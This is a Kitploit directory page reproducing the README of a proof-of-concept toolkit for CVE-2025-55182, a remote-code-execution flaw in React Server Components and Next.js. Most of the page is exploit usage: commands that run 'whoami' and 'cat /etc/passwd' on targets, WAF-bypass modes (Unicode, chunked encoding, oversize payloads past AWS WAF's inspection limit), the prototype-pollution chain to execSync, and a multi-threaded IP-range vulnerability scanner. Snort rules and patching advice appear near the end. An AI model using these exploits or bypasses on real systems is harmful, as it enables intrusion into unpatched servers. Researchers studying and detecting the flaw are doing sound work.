Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-POC — CVE-2025-55182-POC | Kitploit
工具/GitHubGitHub/zxz3650/cve-2025-55182-poc
漏洞分析漏洞利用IDS/IPS规避Web应用程序漏洞利用WAF绕过渗透测试Payload 开发
GitHubzxz3650/cve-2025-55182-poc

CVE-2025-55182-POC

CVE-2025-55182-POC

查看仓库
179个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 POC 与检测

React Server Components (RSC) 不安全反序列化漏洞利用与检测工具集合

漏洞信息

  • CVE-ID: CVE-2025-55182
  • 影响版本: React 19.x, Next.js 15.x/16.x(使用 App Router 时)
  • 攻击向量: RSC Flight 协议反序列化时通过原型污染实现 RCE
  • 风险等级: 严重(CVSS 10.0)

📦 组件

1. 漏洞环境 (Docker)

  • docker-compose.yml - Next.js 15.0.3 + React 19.0.0-rc
  • vulnerable-app/ - 存在漏洞的 Server Action 代码

2. 利用工具

  • exploit_advanced.py - 支持多种攻击技术(Basic/Advanced/Chunked/Oversize)

3. 漏洞扫描器

  • rsc_vulnerability_checker_multi.py - 多目标漏洞诊断工具

4. IDS 检测规则

  • rules_priority_based - 基于 Snort 优先级的检测规则集

🚀 快速开始

1. 搭建漏洞环境

root@kitploit:~
cd vulnerable-app
docker-compose up -d
# 确认 http://localhost:3000 可访问

2. 漏洞诊断

root@kitploit:~
# 测试单个 URL
python3 rsc_vulnerability_checker_multi.py http://localhost:3000

# 批量扫描多个 URL
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

# 扫描 IP 范围
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.1-254 -p 3000 --threads 20

# 从文件读取
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o results.csv

3. 执行利用

root@kitploit:~
# 基本攻击
python3 exploit_advanced.py -u http://localhost:3000 -c "whoami" --basic

# 高级攻击(原型链 + thenable)
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --advanced

# WAF 绕过 - Unicode 编码
python3 exploit_advanced.py -u http://target.com -c "cat /etc/passwd" --advanced --waf-bypass

# WAF 绕过 - 分块传输编码
python3 exploit_advanced.py -u http://target.com -c "uname -a" --chunked

# WAF 绕过 - 超大负载(AWS WAF)
python3 exploit_advanced.py -u http://target.com -c "id" --oversize 65536

# 依次尝试所有技术
python3 exploit_advanced.py -u http://target.com -c "whoami" --all -v

4. 网络检测测试

root@kitploit:~
# 捕获攻击流量
sudo tcpdump -i lo0 -w attack.pcap 'port 3000' &
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --all
sudo pkill tcpdump

# 使用 Snort 分析
snort -c snort.conf -r attack.pcap -A console -k none

利用技术详解

Basic 模式

直接发送 RSC Flight 负载

root@kitploit:~
# 直接调用 Server Action
POST /?__rsc_action__ HTTP/1.1
Content-Type: text/plain
next-action: <action_id>

["$@1",["$","$L2",null,{...}]]

Advanced 模式

利用原型污染实现 RCE

root@kitploit:~
// 核心原理
{
  "then": "$1:__proto__:then",           // 触发 Chunk.prototype.then
  "_response": {                          // 注入伪造 response
    "_formData": {...},
    "_prefix": ""
  },
  "$1:constructor:constructor": Function  // 访问 Function 构造函数
}

攻击链:

  1. 通过 __proto__ 污染设置 Chunk.prototype.then
  2. 注入 _response 对象控制 FormData
  3. $B 处理器调用 response._formData.get(id)
  4. 通过 constructor:constructor 链访问 Function
  5. 执行 process.mainModule.require('child_process').execSync(cmd)

Chunked 模式

利用 Transfer-Encoding 分散模式

root@kitploit:~
POST /?__rsc_action__ HTTP/1.1
Transfer-Encoding: chunked

10
["$@1",["$","
15
$L2",null,{"then
...
  • 绕过 WAF 模式匹配(关键词拆分)
  • 无法通过单一缓冲区检查

Oversize 模式

绕过 AWS WAF 大小限制

root@kitploit:~
payload = original_payload + "X" * (size - len(original_payload))
# AWS WAF: 仅检查前 8KB
# 将实际攻击代码放在 8KB 之后

📊 检测规则优先级

P0 规则 (SID 2000xxx) - 立即拦截

  • process.mainModule.require + child_process + execSync
  • __proto__ + resolved_model + RCE 模块
  • 访问 /etc/passwd, /etc/shadow, .ssh/id_rsa

📋 要求

必需

  • Docker & Docker Compose
  • Python 3.8+
  • requests 库
    root@kitploit:~
    pip install requests
    

可选(用于检测测试)

  • Snort 2.9+
  • tcpdump

🔍 漏洞扫描器使用方法

基本用法

root@kitploit:~
# 单个 URL
python3 rsc_vulnerability_checker_multi.py http://target.com

# 多个 URL
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

高级用法

root@kitploit:~
# IP 范围扫描 (CIDR)
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.0/24 -p 3000

# IP 范围扫描 (连字符)
python3 rsc_vulnerability_checker_multi.py -r 10.0.0.1-254 -p 8080 --threads 50

# 文件输入/输出
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o scan_results.csv

# Verbose 模式
python3 rsc_vulnerability_checker_multi.py http://target.com -v

输出格式

root@kitploit:~
[VULNERABLE] http://target.com:3000 - React 19.0.0-rc, Next.js 15.0.3
[SAFE] http://example.com:3000 - Not vulnerable
[ERROR] http://offline.com:3000 - Connection timeout

🎯 利用工具选项

攻击模式

  • --basic: 直接发送 RSC Flight 负载
  • --advanced: 原型链 + thenable 技术
  • --chunked: Transfer-Encoding 分块传输
  • --oversize <size>: 超大负载(默认: 65536 bytes)
  • --all: 依次尝试所有技术

WAF 绕过

  • --waf-bypass: Unicode 编码(constructor → \u0063onstructor)
  • --chunked: 分散模式放置
  • --oversize: 绕过 AWS WAF 大小限制

其他

  • -v, --verbose: 详细输出
  • -t, --timeout: 请求超时(默认: 10秒)

🛡 防御与检测

应用层面

  1. 升级 React 19.0.0-rc → 19.0.0 (稳定版)
  2. 升级 Next.js 15.0.3 → 15.1.0+
  3. 加强 Server Actions 输入验证
  4. 禁用 experimental 功能

网络层面

  1. 应用 Snort 规则(rules_priority_based)
  2. WAF 策略:
    • 拦截 __proto__ 关键词
    • 拦截 process.mainModule.require 模式
    • 限制 POST body 大小 (< 1MB)
  3. 频率限制(限制 Server Action 请求)

监控

root@kitploit:~
# Snort 实时监控
snort -c snort.conf -i eth0 -A console

# 日志文件分析
snort -c snort.conf -r network.pcap -A fast

本内容仅用于研究/教育/诊断验证目的,请勿用于其他用途。

下载工具